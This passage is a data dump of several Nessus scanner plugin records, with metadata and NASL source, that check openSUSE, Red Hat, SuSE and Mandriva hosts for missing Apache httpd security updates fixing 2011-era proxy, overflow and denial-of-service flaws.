"href": "https://www.tenable.com/plugins/nessus/75427", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5519.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75427);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2012:0248-1)\");\n script_summary(english:\"Check for the apache2-5519 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security 
update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes\nfor a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch\ndirectives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a\nheap based buffer overflow could potentially allow local attackers to\ngain privileges\n\nIn addition to that the following changes were made :\n\n - new template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1\n only, browser match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with\n deleted binaries by message to stdout only, but refrain\n from sending signals.\n\n- httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make\nnon-ascii eg UTF8 passwords work with mod_authnz_ldap.\n[bnc#727071]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00044.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-devel-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-certificates-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-pages-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-itk-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-prefork-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-utils-2.2.15-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-worker-2.2.15-4.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-devel / 
apache2-example-certificates / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:58:29", "description": "Updated httpd packages that fix two security issues and one bug are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting the CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update introduced regressions in the way httpd handled certain Range HTTP header values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. 
After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-21T00:00:00", "type": "nessus", "title": "RHEL 6 : httpd (RHSA-2011:1391)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.1"], "id": "REDHAT-RHSA-2011-1391.NASL", "href": "https://www.tenable.com/plugins/nessus/56578", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1391. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56578);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\");\n script_bugtraq_id(49616, 49957);\n script_xref(name:\"RHSA\", value:\"2011:1391\");\n\n script_name(english:\"RHEL 6 : httpd (RHSA-2011:1391)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix two security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. 
A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting\nthe CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP\nheader values. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3368\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1391\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1391\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-9.el6_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-9.el6_1.3\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-9.el6_1.3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-16T17:01:22", "description": "This update brings Apache to version 2.2.12.\n\nThe main reason is the enablement of the Server Name Indication (SNI) that allows several SSL-enabled domains on one IP address (FATE#311973). See the SSLStrictSNIVHostCheck directive as documented in /usr/share/apache2/manual/mod/mod_ssl.html.en\n\nAlso the patch for the ByteRange remote denial of service attack (CVE-2011-3192) was refined and the configuration options used by upstream were added.\n\nIntroduce new config option: Allow MaxRanges Number of ranges requested, if exceeded, the complete content is served. default: 200 0|unlimited: unlimited none: Range headers are ignored. This option is a backport from 2.2.21.\n\nAlso fixed were\n\n - Denial of service in proxy_ajp when using a undefined method. (CVE-2011-3348)\n\n - Exposure of internal servers via reverse proxy methods with mod_proxy enabled and incorrect Rewrite or Proxy Rules. This update also includes a newer apache2-vhost-ssl.template, which disables SSLv2, and allows SSLv3 and strong ciphers only. Please note that existing vhosts will not be converted. 
(CVE-2011-3368)", "cvss3": {"score": null, "vector": null}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5344)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2", "p-cpe:/a:novell:suse_linux:11:apache2-doc", "p-cpe:/a:novell:suse_linux:11:apache2-example-pages", "p-cpe:/a:novell:suse_linux:11:apache2-prefork", "p-cpe:/a:novell:suse_linux:11:apache2-utils", "p-cpe:/a:novell:suse_linux:11:apache2-worker", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_APACHE2-111026.NASL", "href": "https://www.tenable.com/plugins/nessus/57089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57089);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"SuSE 11.1 Security Update : Apache2 (SAT Patch Number 5344)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings Apache to version 2.2.12.\n\nThe main reason is the enablement of the Server Name Indication (SNI)\nthat allows several SSL-enabled domains on one IP address\n(FATE#311973). 
See the SSLStrictSNIVHostCheck directive as documented\nin /usr/share/apache2/manual/mod/mod_ssl.html.en\n\nAlso the patch for the ByteRange remote denial of service attack\n(CVE-2011-3192) was refined and the configuration options used by\nupstream were added.\n\nIntroduce new config option: Allow MaxRanges Number of ranges\nrequested, if exceeded, the complete content is served. default: 200\n0|unlimited: unlimited none: Range headers are ignored. This option is\na backport from 2.2.21.\n\nAlso fixed were\n\n - Denial of service in proxy_ajp when using a undefined\n method. (CVE-2011-3348)\n\n - Exposure of internal servers via reverse proxy methods\n with mod_proxy enabled and incorrect Rewrite or Proxy\n Rules. This update also includes a newer\n apache2-vhost-ssl.template, which disables SSLv2, and\n allows SSLv3 and strong ciphers only. Please note that\n existing vhosts will not be converted. (CVE-2011-3368)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=693479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=719236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3192.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5344.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") 
audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-doc-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-example-pages-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-prefork-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-utils-2.2.12-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"apache2-worker-2.2.12-1.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:36:05", "description": "Multiple vulnerabilities has been found and corrected in apache :\n\nInteger overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow (CVE-2011-3607).\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) 
ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an \\@ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368 (CVE-2011-4317).\n\nThe updated packages have been patched to correct these issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-01-11T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2012:003)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:apache-base", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_userdir", "p-cpe:/a:mandriva:linux:apache-modules", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "p-cpe:/a:mandriva:linux:apache-source", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2012-003.NASL", "href": 
"https://www.tenable.com/plugins/nessus/57480", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:003. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57480);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-4317\");\n script_bugtraq_id(50494, 50802);\n script_xref(name:\"MDVSA\", value:\"2012:003\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2012:003)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in apache :\n\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow (CVE-2011-3607).\n\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the 